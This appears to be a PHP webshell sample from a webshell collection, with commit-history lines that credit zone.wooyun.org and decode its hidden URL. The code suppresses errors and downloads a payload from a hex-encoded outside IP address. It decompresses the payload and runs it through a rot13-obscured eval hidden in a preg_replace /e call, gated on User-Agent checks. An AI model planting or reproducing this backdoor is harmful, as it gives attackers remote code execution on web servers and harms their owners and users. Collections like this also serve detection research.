webshell/php/w.php

<?php 
error_reporting(0); 
session_start(); 
header("Content-type:text/html;charset=gbk"); 
$password = "d69tjj0sb2dlbq9"; 
if(empty($_SESSION['api1234'])) 
  $_SESSION['api1234']=file_get_contents(sprintf('%s?%s',pack("H*",'687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067'),uniqid())); 
if(stripos($_SERVER['HTTP_USER_AGENT'],'baidu')+0==0) exit; 
if(stripos($_SERVER['HTTP_USER_AGENT'],'myccs')+0==0) exit;   
($b4dboy = gzuncompress($_SESSION['api1234'])) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); 
?>
Create w.php from : zone.wooyun.org 2016-05-27 13:50:24 +00:00			`<?php`
			`error_reporting(0);`
			`session_start();`
			`header("Content-type:text/html;charset=gbk");`
			`$password = "d69tjj0sb2dlbq9";`
			`if(empty($_SESSION['api1234']))`
			`$_SESSION['api1234']=file_get_contents(sprintf('%s?%s',pack("H*",'687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067'),uniqid()));`
			`if(stripos($_SERVER['HTTP_USER_AGENT'],'baidu')+0==0) exit;`
			`if(stripos($_SERVER['HTTP_USER_AGENT'],'myccs')+0==0) exit;`
			`($b4dboy = gzuncompress($_SESSION['api1234'])) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');`
			`?>`
Update w.php ``` php 687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067 ``` to ``` php http://123.125.114.82/jxfbucket20141/hack/1.jpg ``` 2016-05-27 13:52:18 +00:00